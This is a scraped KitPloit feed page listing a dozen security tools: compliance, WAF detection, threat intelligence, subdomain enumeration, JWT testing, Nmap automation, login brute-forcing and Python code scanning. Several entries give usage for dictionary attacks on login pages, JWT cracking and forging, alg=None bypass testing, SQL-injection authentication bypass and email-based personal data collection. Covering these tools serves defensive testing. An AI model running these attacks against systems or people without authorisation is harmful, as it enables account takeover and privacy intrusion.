Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5838 articles
Browse latest View live

Pacbot - Platform For Continuous Compliance Monitoring, Compliance Reporting And Security Automation For The Cloud

$
0
0

Policy as Code Bot (PacBot) is a platform for continuous compliance monitoring, compliance reporting and security automation for the cloud. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot auto-fix framework provides the ability to automatically respond to policy violations by taking predefined actions. PacBot packs in powerful visualization features, giving a simplified view of compliance and making it easy to analyze and remediate policy violations. PacBot is more than a tool to manage cloud misconfiguration, it is a generic platform that can be used to do continuous compliance monitoring and reporting for any domain.

More Than Cloud Compliance Assessment
PacBot's plugin-based data ingestion architecture allows ingesting data from multiple sources. We have built plugins to pull data from Qualys Vulnerability Assessment Platform, Bitbucket, TrendMicro Deep Security, Tripwire, Venafi Certificate Management, Redhat Satellite, Spacewalk, Active Directory and several other custom-built internal solutions. We are working to open source these plugins and other tools as well. You could write rules based on data collected by these plugins to get a complete picture of your ecosystem and not just cloud misconfigurations. For example, within T-Mobile we have implemented a policy to mark all EC2 instances having one or more severity 5 (CVSS score > 7) vulnerabilities as non-compliant.

Quick Demo


How Does It Work?
Assess -> Report -> Remediate -> Repeat
Assess -> Report -> Remediate -> Repeat is PacBot's philosophy. PacBot discovers resources and assesses them against the policies implemented as code. All policy violations are recorded as an issue. Whenever an Auto-Fix hook is available with the policies, those auto-fixes are executed when the resources fail the evaluation. Policy violations cannot be closed manually, the issue has to be fixed at the source and PacBot will mark it closed in the next scan. Exceptions can be added to policy violations. Sticky exceptions (Exception based on resource attribute matching criteria) can be added to exempt similar resources that may be created in future.
PacBot's Asset Groups are a powerful way to visualize compliance. Asset Groups are created by defining one or more target resource's attribute matching criteria. For example, you could create an Asset Group of all running assets by defining criteria to match all EC2 instances with attribute instancestate.name=running. Any new EC2 instance launched after the creation of the Asset Group will be automatically included in the group. In PacBot UI you can select the scope of the portal to a specific asset group. All the data points shown in the PacBot portal will be confined to the selected Asset Group. Teams using cloud can set the scope of the portal to their application or org and focus only on their policy violations. This reduces noise and provides a clear picture to cloud users. At T-Mobile, we create an Asset Groups per stakeholder, per application, per AWS account, per Environment etc.
Asset groups can also be used to define the scope of rule executions as well. PacBot policies are implemented as one or more rules. These rules can be configured to run against all resources or a specific Asset Group. The rules will evaluate all resources in the asset group configured as the scope for the rule. This provides an opportunity to write policies which are very specific to an application or org. For example, some teams would like to enforce additional tagging standards apart from the global standards set for all of the cloud. They can implement such policies with custom rules and configure these rules to run only on their assets.

PacBot Key Capabilities
  • Continuous compliance assessment.
  • Detailed compliance reporting.
  • Auto-Fix for policy violations.
  • Omni Search - Ability to search all discovered resources.
  • Simplified policy violation tracking.
  • Self-Service portal.
  • Custom policies and custom auto-fix actions.
  • Dynamic asset grouping to view compliance.
  • Ability to create multiple compliance domains.
  • Exception management.
  • Email Digests.
  • Supports multiple AWS accounts.
  • Completely automated installer.
  • Customizable dashboards.
  • OAuth Support.
  • Azure AD integration for login.
  • Role-based access control.
  • Asset 360 degree.

Technology Stack
  • Front End - Angular
  • Backend End APIs, Jobs, Rules - Java
  • Installer - Python and Terraform

Deployment Stack
  • AWS ECS & ECR - For hosting UI and APIs
  • AWS Batch - For rules and resource collection jobs
  • AWS CloudWatch Rules - For rule trigger, scheduler
  • AWS Redshift - Data warehouse for all the inventory collected from multiple sources
  • AWS Elastic Search - Primary data store used by the web application
  • AWS RDS - For admin CRUD functionalities
  • AWS S3 - For storing inventory files and persistent storage of historical data
  • AWS Lambda - For gluing few components of PacBot
PacBot installer automatically launches all of these services and configures them. For detailed instruction on installation look at the installation documentation.

PacBot UI Dashboards & Widgets

  • Asset Group Selection Widget

  • Compliance Dashboard



  • Policy Compliance Page - S3 buckets public read access

  • Policy Compliance Trend Over Time

  • Asset Dashboard

  • Asset Dashboard - With Recommendations

  • Asset 360 / Asset Details Page

  • Linux Server Quarterly Patch Compliance

  • Omni-Search Page

  • Search Results Page With Results filtering

  • Tagging Compliance Summary Widget


Installation
Detailed installation instructions are available here

Usage
The installer will launch required AWS services listed in the installation instructions. After successful installation, open the UI load balancer URL. Log into the application using the credentials supplied during the installation. The results from the policy evaluation will start getting populated within an hour. Trendline widgets will be populated when there are at least two data points.
When you install PacBot, the AWS account where you install is the base account. PacBot installed on the base account can monitor other target AWS accounts. Refer to the instructions here to add new accounts to PacBot. By default base account will be monitored by PacBot.
Login as Admin user and go to the Admin page from the top menu. In the Admin section, you can
  1. Create/Manage Policies
  2. Create/Manage Rules and associate Rules with Policies
  3. Create/Manage Asset Groups
  4. Create/Manage Sticky Exception
  5. Manage Jobs
  6. Create/Manage Access Roles
  7. Manage PacBot Configurations
See detailed instruction with screenshots on how to use the admin feature here

User Guide / Wiki
Wiki is here.

Announcement Blog Post
Introducing PacBot



Horn3t - Powerful Visual Subdomain Enumeration At The Click Of A Mouse

$
0
0

Horn3t is your Nr #1 tool for exploring subdomains visually.
Building on the great Sublist3r framework (or extensible with your favorite one) it searches for subdomains and generates awesome picture previews. Get a fast overview of your target with http status codes, add custom found subdomains and directly access found urls with one click.
  • Recon your targets at blazing speed
  • Enhance your productivity by focusing on interesting looking sites
  • Enumerate critical sites immediately
  • Sting your target

Installation
  • Install Google Chrome
  • Install requirements.txt with pip3
  • Install requirements.txt of sublist3r with pip3
  • Put the directory within the web server of your choice
  • Make sure to have the right permissions
  • Run horn3t.py
Or alternatively use the install.sh file with docker.
Afterwards you can access the web portal under http://localhost:1337

Todo
  • Better Scaling on Firefox
  • Add Windows Dockerfile
  • Direkt Nmap Support per click on a subdomain
  • Direkt Dirb Support per click on a subdomain
  • Generate PDF Reports of found subdomains
  • Assist with subdomain takeover

Credits
  • aboul3la - The creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of sublist3r.
  • TheRook - The bruteforce module was based on his script subbrute.
  • bitquark - The Subbrute's wordlist was based on his research dnspop.
Tested on Windows 10 and Debian with Google Chrome/Chromium 73


WAFW00F v1.0.0 - Detect All The Web Application Firewall!

$
0
0

WAFW00F identifies and fingerprints Web Application Firewall (WAF) products.

How does it work?
To do its magic, WAFW00F does the following:
  • Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions.
  • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
  • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.

What does it detect?
It detects a number of WAFs. To view which WAFs it is able to detect run WAFW00F with the -l option. At the time of writing the output is as follows:
$ wafw00f -l
______
/ \
( Woof! )
\______/ )
,, ) (_
.-. - _______ ( |__|
()``; |==|_______) .)|__|
/ (' /|\ ( |__|
( / ) / | \ . |__|
\(_)_)) / | \ |__|

WAFW00F - Web Application Firewall Detection Tool

Can test for these WAFs:

BlockDoS (BlockDoS)
Armor Defense (Armor)
ACE XML Gateway (Cisco)
Malcare (Inactiv)
RSFirewall (RSJoomla!)
PerimeterX (PerimeterX)
Varnish (OWASP)
Barracuda Application Firewall (Barracuda Networks)
Anquanbao (Anquanbao)
NetContinuum (Barracuda Networks)
HyperGuard (Art of Defense)Incapsula (Imperva Inc.)
Safedog (SafeDog)
NevisProxy (AdNovum)
SEnginx (Neusoft)
BitNinja (BitNinja)
Janusec Application Gateway (Janusec)
NinjaFirewall (NinTechNet)
Edgecast (Verizon Digital Media)
Alert Logic (Alert Logic)
Cloudflare (Cloudflare Inc.)
SecureSphere (Imperva Inc.)
Bekchy (Faydata Technologies Inc.)
Kona Site Defender (Akamai)
Wallarm (Wallarm Inc.)
Cloudfront (Amazon)
aeSecure (aeSecure)
eEye SecureIIS (BeyondTrust)
VirusDie (VirusDie LLC)
DOSarrest (DOSarrest Internet Security)
SiteGround (SiteGround)
Chuang Yu Shield (Yunaq)
Yunsuo (Yunsuo)
NAXSI (NBS Systems)
UTM Web Protection (Sophos)
Approach (Approach)
NetScaler AppFirewall (Citrix Systems)
DynamicWeb Injection Check (DynamicWeb)
Xuanwudun
WebTotem (WebTotem)
Comodo (Comodo CyberSecurity Solutions)
WTS-WAF (WTS)
PowerCDN (PowerCDN)
BIG-IP Access Policy Manager (F5 Networks)
BinarySec (BinarySec)
Greywizard (Grey Wizard)
Shield Security (One Dollar Plugin)
ASP.NET Generic Web Application Protection
CacheWall (Varnish)
Expression Engine (EllisLab)
Airlock (Phion/Ergon)
WatchGuard (WatchGuard Technologies)
WP Cerber Security (Cerber Tech)
Yunjiasu (Baidu Cloud Computing)
DenyALL (Rohde & Schwarz CyberSecurity)
AnYu (AnYu Technologies)
Secure Entry (United Security Providers)
ISA Server (Microsoft)
Yundun (Yundun)
FirePass (F5 Networks)
GoDaddy Website Protection (GoDaddy)
Imunify360 (CloudLinux)
Safe3 Web Firewall (Safe3)
WebSEAL (IBM)
NSFocus (NSFocus Global Inc.)
360WangZhanBao (360 Technologies)
Squarespace (Squarespace)
Imperva SecureSphere
B luedon (Bluedon IST)
AliYunDun (Alibaba Cloud Computing)
Wordfence (Feedjit)
Palo Alto Next Gen Firewall (Palo Alto Networks)
Tencent Cloud Firewall (Tencent Technologies)
West263CDN
WebARX (WebARX Security Solutions)
Mission Control Application Shield (Mission Control)
BIG-IP Local Traffic Manager (F5 Networks)
Sitelock (TrueShield)
ZScaler (Accenture)
CrawlProtect (Jean-Denis Brun)
Teros (Citrix Systems)
AWS Elastic Load Balancer (Amazon)
Cloudbric (Zendesk)
StackPath (StackPath)
URLScan (Microsoft)
Sucuri (Sucuri Inc.)
TransIP Web Firewall (TransIP)
OnMessage Shield (BlackBaud)
Distil (Distil Networks)
Profense (ArmorLogic)
ModSecurity (SpiderLabs)
FortiWeb (Fortinet)
XLabs Security WAF (XLabs)
ASP.NET RequestValidationMode (Microsoft)
Jiasule (Jiasule)
ChinaCache CDN L oad Balancer (ChinaCache)
URLMaster SecurityCheck (iFinity/DotNetNuke)
Reblaze (Reblaze)
Newdefend (NewDefend)
Trafficshield (F5 Networks)
KS-WAF (KnownSec)
SiteGuard (Sakura Inc.)
CdnNS Application Gateway (CdnNs/WdidcNet)
DataPower (IBM)
WebKnight (AQTRONIX)
BIG-IP Application Security Manager (F5 Networks)
Barikode (Ethic Ninja)
Zenedge (Zenedge)
SonicWall (Dell)
DotDefender (Applicure Technologies)
USP Secure Entry Server
AppWall (Radware)

How do I use it?
First, install the tools as described here.
For help please make use of the --help option. The basic usage is to pass it a URL as an argument. Example:
$  wafw00f https://example.org

______
/ \
( Woof! )
\______/ )
,, ) (_
.-. - _______ ( |__|
()``; |==|_______) .)|__|
/ (' /|\ ( |__|
( / ) / | \ . |__|
\(_)_)) / | \ |__|

WAFW00F - Web Application Firewall Detection Tool

Checking https://example.org
The site https://example.org is behind Edgecast (Verizon Digital Media) WAF.
Number of requests: 1

How do I install it?
The following should do the trick:
python setup.py install

Looking for pentesters?
More information about the services that we offer at Enable Security

How do I write my own new checks?
Follow the instructions on the wiki


Machinae v1.4.8 - Security Intelligence Collector

$
0
0

Machinae is a tool for collecting intelligence from public sites/feeds about various security-related pieces of data: IP addresses, domain names, URLs, email addresses, file hashes, and SSL fingerprints. It was inspired by Automater, another excellent tool for collecting information. The Machinae project was born from wishing to improve Automater in 4 areas:
  1. Codebase - Bring Automater to python3 compatibility while making the code more pythonic
  2. Configuration - Use a more human readable configuration format (YAML)
  3. Inputs - Support JSON parsing out-of-the-box without the need to write regular expressions, but still support regex scraping when needed
  4. Outputs - Support additional output types, including JSON, while making extraneous output optional

Installation
Machinae can be installed using pip3:
pip3 install machinae
Or, if you're feeling adventurous, can be installed directly from github:
pip3 install git+https://github.com/HurricaneLabs/machinae.git
You will need to have whatever dependencies are required on your system for compiling Python modules (on Debian based systems, python3-dev), as well as the libyaml development package (on Debian based systems, libyaml-dev).
You'll also want to grab the latest configuration file and place it in /etc/machinae.yml.

Configuration File
Machinae supports a simple configuration merging system to allow you to make adjustments to the configuration without modifying the machinae.yml we provide you, making configuration updates a snap. This is done by finding a system-wide default configuration (default /etc/machinae.yml), merging into that a system-wide local configuration (/etc/machinae.local.yml) and finally a per-user local configuration (~/.machinae.yml). The system-wide configuration can also be located in the current working directory, can be set using the MACHINAE_CONFIG environment variable, or of course by using the -c or --configcommand line options. Configuration merging can be disabled by passing the --nomerge option, which will cause Machinae to only load the default system-wide configuration (or the one passed on the command line).
As an example of this, say you'd like to enable the Fortinet Category site, which is disabled by default. You could modify /etc/machinae.yml, but these changes would be overwritten by an update. Instead, you can put the following in either /etc/machinae.local.yml or ~/.machinae.yml:
fortinet_classify:
default: true
Or, conversely, to disable a site, such as Virus Total pDNS:
vt_ip:
default: false
vt_domain:
default: false

Usage
Machinae usage is very similar to Automater:
usage: machinae [-h] [-c CONFIG] [--nomerge] [-d DELAY] [-f FILE] [-i INFILE] [-v]
[-o {D,J,N,S}] [-O {ipv4,ipv6,fqdn,email,sslfp,hash,url}] [-q]
[-s SITES] [-a AUTH] [-H HTTP_PROXY]
[--dump-config | --detect-otype]
...
  • See above for details on the -c/--config and --nomerge options.
  • Machinae supports a -d/--delay option, like Automater. However, Machinae uses 0 by default.
  • Machinae output is controlled by two arguments:
    • -o controls the output format, and can be followed by a single character to indicated the desired type of output:
      • N is the default output ("Normal")
      • D is the default output, but dot characters are replaced
      • J is JSON output
    • -f/--file specifies the file where output should be written. The default is "-" for stdout.
  • Machinae will attempt to auto-detect the type of target passed in (Machinae refers to targets as "observables" and the type as "otype"). This detection can be overridden with the -O/--otype option. The choices are listed in the usage
  • By default, Machinae operates in verbose mode. In this mode, it will output status information about the services it is querying on the console as they are queried. This output will always be written to stdout, regardless of the output setting. To disable verbose mode, use -q
  • By default, Machinae will run through all services in the configuration that apply to each target's otype and are not marked as "default: false". To modify this behavior, you can:
    • Pass a comma separated list of sites to run (use the top level key from the configuration).
    • Pass the special keyword all to run through all services including those marked as "default: false"
    Note that in both cases, otype validation is still applied.
  • Machinae supports passing an HTTP proxy on the command line using the -H/--http-proxy argument. If no proxy is specified, machinae will search the standard HTTP_PROXY and HTTPS_PROXY environment variables, as well as the less standard http_proxy and https_proxy environment variables.
  • Lastly, a list of targets should be passed. All arguments other than the options listed above will be interpreted as targets.

Out-of-the-Box Data Sources
Machinae comes with out-of-the-box support for the following data sources:
  • IPVoid
  • URLVoid
  • URL Unshortener (http://www.toolsvoid.com/unshorten-url)
  • Malc0de
  • SANS
  • FreeGeoIP (freegeoip.io)
  • Fortinet Category
  • VirusTotal pDNS (via web scrape - commented out)
  • VirusTotal pDNS (via JSON API)
  • VirusTotal URL Report (via JSON API)
  • VirusTotal File Report (via JSON API)
  • Reputation Authority
  • ThreatExpert
  • VxVault
  • ProjectHoneypot
  • McAfee Threat Intelligence
  • StopForumSpam
  • Cymru MHR
  • ICSI Certificate Notary
  • TotalHash (disabled by default)
  • DomainTools Parsed Whois (Requires API key)
  • DomainTools Reverse Whois (Requires API key)
  • DomainTools Reputation
  • IP WHOIS (Using RIR REST interfaces)
  • Hacked IP
  • Metadefender Cloud (Requires API key)
  • GreyNoise (Requires API key)
  • IBM XForce (Required API key)
With additional data sources on the way.

HTTP Basic Authentication and Configuration
Machinae supports HTTP Basic Auth for sites that require it through the --auth/-a flag. You will need to create a YAML file with your credentials, which will include a key to the site that requires the credentials and a list of two items, username and password or API key. For example, for the included PassiveTotal site this might look like:
passivetotal: ['myemail@example.com', 'my_api_key']
Inside the site configuration under request you will see a key such as:
json:
request:
url: '...'
auth: passivetotal
The auth: passivetotal points to the key inside the authentication config passed via the command line.

Disabled by default
The following sites are disabled by default
  • Fortinet Category (fortinet_classify)
  • Telize Geo IP (telize)
  • TotalHash (totalhash_ip)
  • DomainTools Parsed Whois (domaintools_parsed_whois)
  • DomainTools Reverse Whois (domaintools_reverse_whois)
  • DomainTools Reputation (domaintools_reputation)
  • PassiveTotal Passive DNS (passivetotal_pdns)
  • PassiveTotal Whois (passivetotal_whois)
  • PassiveTotal SSL Certificate History (passivetotal_sslcert)
  • PassiveTotal Host Attribute Components (passivetotal_components)
  • PassiveTotal Host Attribute Trackers (passivetotal_trackers)
  • MaxMind GeoIP2 Passive Insight (maxmind)
  • FraudGuard (fraudguard)
  • Shodan (shodan)
  • Hacked IP
  • Metadefender Cloud (Requires API key)
  • GreyNoise (Requires API key)
  • IBM XForce (Requires API key)

Output Formats
Machinae comes with a limited set of output formats: normal, normal with dot escaping, and JSON. We plan to add additional output formats in the future.

Adding additional sites
*** COMING SOON ***

Known Issues
  • Some ISP's on IPvoid contain double-encoded HTML entities, which are not double-decoded

Upcoming Features
  • Add IDS rule search functionality (VRT/ET)
  • Add "More info" link for sites
  • Add "dedup" option to parser settings
  • Add option for per-otype request settings
  • Add custom per-site output for error codes

Version History

Version 1.4.1 (2018-08-31)
  • New Features
    • Automatically Defangs output
    • MISP Support (example added to machinae.yml)

Version 1.4.0 (2016-04-20)
  • New features
    • "-a"/"--auth" option for passing an auth config file
      • Thanks johannestaas for the submission
    • "-H"/"--http-proxy" option, and environment support, for HTTP proxies
  • New sites
    • Passivetotal (various forms, thanks johannestaas)
    • MaxMind
    • FraudGuard
    • Shodan
  • Updated sites
    • FreeGeoIP (replaced freegeoip.net with freegeoip.io)

Version 1.3.4 (2016-04-01)
  • Bug fixes
    • Convert exceptions to str when outputting to JSON
      • Should actually close #14

Version 1.3.3 (2016-03-28)
  • Bug fixes
    • Correctly handle error results when outputting to JSON
      • Closes #14
      • Thanks Den1al for the bug report

Version 1.3.2 (2016-03-10)
  • New features
    • "Short" output mode - simply output yes/no/error for each site
    • "-i"/"--infile" option for passing a file with list of targets

Version 1.3.1 (2016-03-08)
  • New features
    • Prepend "http://" to URL targets when not starting with http:// or https://

Version 1.3.0 (2016-03-07)
  • New sites
    • Cymon.io - Threat intel aggregator/tracker by eSentire
  • New features
    • Support simple paginated responses
    • Support url encoding 'target' in request URL
    • Support url decoding values in results

Version 1.2.0 (2016-02-16)
  • New features
    • Support for sites returning multiple JSON documents
    • Ability to specify time format for relative time parameters
    • Ability to parse Unix timestamps in results and display in ISO-8601 format
    • Ability to specify status codes to ignore per-API
  • New sites
    • DNSDB - FarSight Security Passive DNS Data base (premium)

Version 1.1.2 (2015-11-26)
  • New sites
    • Telize (premium) - GeoIP site (premium)
    • Freegeoip - GeoIP site (free)
    • CIF - CIFv2 API support, from csirtgadgets.org
  • New features
    • Ability to specify labels for single-line multimatch JSON outputs
    • Ability to specify relative time parameters using relatime library

Version 1.0.1 (2015-10-13)
  • Fixed a false-positive bug with Spamhaus (Github#10)

Version 1.0.0 (2015-07-02)
  • Initial release



Trigmap - A Wrapper For Nmap To Automate The Pentest

$
0
0

Trigmap is a wrapper for Nmap. You can use it to easily start Nmap scan and especially to collect informations into a well organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient thanks to the optimized Nmap algorithms.

Details
Trigmap can performs several tasks using Nmap scripting engine (NSE):
  • Port Scan
  • Service and Version Detection
  • Web Resources Enumeration
  • Vulnerability Assessment
  • Common Vulnerabilities Test
  • Common Exploits Test
  • Dictionary Attacks Against Active Services
  • Default Credentials Test

Usage
Trigmap can be used in two ways:
  • Interactive mode:
trigmap [ENTER], and the script does the rest

  • NON-interactive mode:
trigmap -h|--host <target/s> [-tp|--tcp TCP ports] [-up|--udp UDP ports] [-f|--file file path] [-s|--speed time profile] [-n|--nic NIC] [-p|--phase phases]

If you want to see the help:
trigmap --help to print this helper

For more screenshots see the relative directory of the repository.

Dir Hierarchy

Customization
It's possible to customize the script by changing the value of variables at the beginning of the file. In particularly you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).
##############################################
### PARAMETERS ###
##############################################
GENERAL_USER_LIST='general_user_wordlist_short.txt'
WIN_USER_LIST='win_user_wordlist_short.txt'
UNIX_USER_LIST='unix_user_wordlist_short.txt'
SHORT_PASS_LIST='fasttrack.txt'
LONG_PASS_LIST='rockyou.txt'

##############################################
### NMAP SETTING ###
##############################################

# PE (echo req), PP (timestamp-request)
# you can add a port on every ping scan
NMAP_PING='-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445'

NMAP_OTHER='-sV --allports -O --fuzzy --min-hostgroup 256'

SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)'

SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)'

SCRIPT_ARGS="userdb=$GENERAL_USER_LIST,passdb=$SHORT_PAS S_LIST"

CUSTOM_SCAN='--max-retries 3 --min-rate 250' # LIKE UNICORNSCAN

Twin Brother
This project is very similar to Kaboom, but it has a different philosophy; infact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is the portability and the efficient, but it's recommended to use both the tools to scan the targets in a such way to gather more evidence with different tools (redundancy and reliability).


JWT Tool - A Toolkit For Testing, Tweaking And Cracking JSON Web Tokens

$
0
0
jwt_tool.py is a toolkit for validating, forging and cracking JWTs (JSON Web Tokens).
Its functionality includes:
  • Checking the validity of a token
  • Testing for the RS/HS256 public key mismatch vulnerability
  • Testing for the alg=None signature-bypass vulnerability
  • Testing the validity of a secret/key/key file
  • Identifying weak keys via a High-speed Dictionary Attack
  • Forging new token header and payload values and creating a new signature with the key or via another attack method

Audience
This tool is written for pentesters, who need to check the strength of the tokens in use, and their susceptibility to known attacks.
It may also be useful for developers who are using JWTs in projects, but would like to test for stability and for known vulnerabilities, when using forged tokens.

Requirements
This tool is written natively in Python 2.x using the common libraries.
Customised wordlists are recommended for the Dictionary Attack option.
As a speed reference, an Intel i5 laptop can test ~1,000,000 passwords per second on HMAC-SHA256 signing. YMMV.

Installation
Installation is just a case of downloading the jwt_tool.py file (or git cloneing the repo).
(chmod the file too if you want to add it to your $PATH and call it from anywhere.)

Usage
$ python jwt_tool.py <JWT> (filename)
The first argument should be the JWT itself, followed by a filename/filepath (for cracking the token, or for use as a key file).
For example:
$ python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw /usr/share/wordlists/rockyou.txt
The toolkit will validate the token and list the header and payload values.
It will then provide a menu of your available options.
Note: signing the token is currently supported using HS256, HS384, HS512 algorithms
Input is in either standard or url-safe JWT format, and the resulting tokens are output in both formats for your ease of use.

Further Reading

Tips
Regex for finding JWTs in Burp Search
(make sure 'Case sensitive' and 'Regex' options are ticked)
[= ]ey[A-Za-z0-9_-]*\.[A-Za-z0-9._-]* - url-safe JWT version
[= ]ey[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]* - all JWT versions (higher possibility of false positives)


SecurityRAT - Tool For Handling Security Requirements In Development

$
0
0

OWASP Security RAT (Requirement Automation Tool) is a tool supposed to assist with the problem of addressing security requirements during application development. The typical use case is:
  • specify parameters of the software artifact you're developing
  • based on this information, list of common security requirements is generated
  • go through the list of the requirements and choose how you want to handle the requirements
  • persist the state in a JIRA ticket (the state gets attached as a YAML file)
  • create JIRA tickets for particular requirements in a batch mode in developer queues
  • import the main JIRA ticket into the tool anytime in order to see progress of the particular tickets

Documentation
Please go to https://securityrat.github.io

OWASP Website
https://www.owasp.org/index.php/OWASP_SecurityRAT_Project


Miteru - An Experimental Phishing Kit Detection Tool

$
0
0
Miteru is an experimental phishing kit detection tool.

How it works

Features
  • Phishing kit detection & collection.
  • Slack notification.
  • Threading.

Installation
$ gem install miteru

Usage
$ miteru
Commands:
miteru execute # Execute the crawler
miteru help [COMMAND] # Describe available commands or one specific command
$ miteru help execute
Usage:
miteru execute

Options:
[--auto-download], [--no-auto-download] # Enable or disable auto-download of phishing kits
[--directory-traveling], [--no-directory-traveling] # Enable or disable directory traveling
[--download-to=DOWNLOAD_TO] # Directory to download file(s)
# Default: /tmp
[--post-to-slack], [--no-post-to-slack] # Post a message to Slack if it detects a phishing kit
[--size=N] # Number of urlscan.io's results. (Max: 10,000)
# Default: 100
[--threads=N] # Number of threads to use
# Default: 10
[--verbose], [--no-verbose]
# Default: true

Execute the crawler
$ miteru execute
...
https://dummy1.com: it doesn't contain a phishing kit.
https://dummy2.com: it doesn't contain a phishing kit.
https://dummy3.com: it doesn't contain a phishing kit.
https://dummy4.com: it might contain a phishing kit (dummy.zip).

Using Docker (alternative if you don't install Ruby)
$ git clone https://github.com/ninoseki/miteru.git
$ cd miteru/docker
$ docker build -t miteru .
$ docker run miteru
# ex. auto-download detected phishing kit(s) into host machines's /tmp directory
$ docker run -v /tmp:/tmp miteru execute --auto-download

Aasciinema cast


Note
For using --post-to-slack feature, you should set the following environment variables:
  • SLACK_WEBHOOK_URL: Your Slack Webhook URL.
  • SLACK_CHANNEL: Slack channel to post a message (default: "#general").

Alternatives



Project iKy - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface

$
0
0

Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Project

First of all we want to advice you that we have changed the Frontend from AngularJS to Angular 7. For this reason we left the project with AngularJS as Frontend in the iKy-v1 branch and the documentation for its installation here.
The reason of changing the Frontend was to update the technology and get an easier way of installation.

Video



Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend


Redis
You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install
And turn on the server in a terminal
redis-server

Python stuff and Celery
You must install the libraries inside requirements.txt
pip install -r requirements.txt
And turn on Celery in another terminal, within the directory backend
./celery.sh
Finally, again, in another terminal turn on backend app from directory backend
python app.py

Install Frontend


Node
First of all, install nodejs.

Dependencies
Inside the directory frontend install the dependencies
npm install

Turn on Frontend Server
Finally, to run frontend server, execute:
npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.

  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded


Acunetix Vulnerability Scanner Now With Network Security Scans

$
0
0

User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.

Seamless OpenVAS integration now also available on Windows and Linux

London, UK – May 2019 – Acunetix, the pioneer in automated web application security software, has announced that all versions of the Acunetix Vulnerability Scanner now support network security scanning. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.
“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.

There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as issue tracker integration and comprehensive reporting.

More Features in the Latest Build

OpenVAS integration is introduced as part of the latest Acunetix version 12 build (build 12.0.190515149). This new build also includes:
  • Support for IPv6
  • Improved usage of machine resources
  • Added support for Selenium scripts as import files
  • Multiple vulnerability checks for SAP
  • Unauthorized access detection for Redis and Memcached
  • Source code disclosure for Ruby and Python
The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found here.

Get a demo of the product here.



Brutemap - Tool That Automates Testing Accounts To The Site's Login Page

$
0
0

Brutemap is an open source penetration testing tool that automates testing accounts to the site's login page, based on Dictionary Attack. With this, you no longer need to search for other bruteforce tools and you also no longer need to ask CMS What is this? only to find parameter forms, because brutemap will do it automatically. Brutemap is also equipped with an attack method that makes it easy for you to do account checking or test forms with the SQL injection bypass authentication technique.


Installation
Brutemap uses selenium to interact with the website. So, you need to install Web Driver for selenium first. See here. If you have installed the git package, you only need to clone the repository Git. Like this:
$ git clone https://github.com/brutemap-dev/brutemap.git
And, install the required modules:
$ pip install -r requirements.txt


Usage
For basic use:
$ python brutemap.py -t http://www.example.com/admin/login.php -u admin -p default
To display a list of available options:
$ python brutemap.py -h
You can find examples of brutemap usage here. For more information about available options, you can visit the User's manual.

Video



Links


Bandit - Tool Designed To Find Common Security Issues In Python Code

$
0
0

Bandit is a tool designed to find common security issues in Python code. To do this Bandit processes each file, builds an AST from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report.
Bandit was originally developed within the OpenStack Security Project and later rehomed to PyCQA.

Installation
Bandit is distributed on PyPI. The best way to install it is with pip:
Create a virtual environment (optional):
virtualenv bandit-env
Install Bandit:
pip install bandit
# Or if you're working with a Python 3 project
pip3 install bandit
Run Bandit:
bandit -r path/to/your/code
Bandit can also be installed from source. To do so, download the source tarball from PyPI, then install it:
python setup.py install


Usage
Example usage across a code tree:
bandit -r ~/your_repos/project
Example usage across the examples/ directory, showing three lines of context and only reporting on the high-severity issues:
bandit examples/*.py -n 3 -lll
Bandit can be run with profiles. To run Bandit against the examples directory using only the plugins listed in the ShellInjection profile:
bandit examples/*.py -p ShellInjection
Bandit also supports passing lines of code to scan using standard input. To run Bandit with standard input:
cat examples/imports.py | bandit -
Usage:
$ bandit -h
usage: bandit [-h] [-r] [-a {file,vuln}] [-n CONTEXT_LINES] [-c CONFIG_FILE]
[-p PROFILE] [-t TESTS] [-s SKIPS] [-l] [-i]
[-f {csv,custom,html,json,screen,txt,xml,yaml}]
[--msg-template MSG_TEMPLATE] [-o [OUTPUT_FILE]] [-v] [-d] [-q]
[--ignore-nosec] [-x EXCLUDED_PATHS] [-b BASELINE]
